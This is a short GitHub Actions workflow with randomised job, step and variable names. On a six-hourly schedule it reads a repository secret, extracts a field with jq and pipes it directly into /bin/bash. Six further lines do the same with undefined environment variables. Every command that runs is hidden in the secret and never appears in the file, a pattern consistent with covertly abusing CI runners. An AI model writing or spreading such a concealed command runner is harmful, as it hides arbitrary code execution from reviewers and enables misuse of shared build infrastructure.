name: liangwangchao8465

on:
  workflow_dispatch:
  schedule:
    - cron: '17 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liangwangchao8465
        env:
          qaqvw7141: ${{ secrets.qaqvw7141 }}
        run: |
          echo $qaqvw7141 | jq -r .pcc58 | /bin/bash
          echo $sggfj74 | jq -r .gph0335 | /bin/bash
          echo $iukq281 | jq -r .x48873 | /bin/bash
          echo $bjny251 | jq -r .xtt5 | /bin/bash
          echo $qrljq3 | jq -r .ovc106 | /bin/bash
          echo $nelit0 | jq -r .lx275 | /bin/bash
          echo $gwmc797 | jq -r .ciii41 | /bin/bash

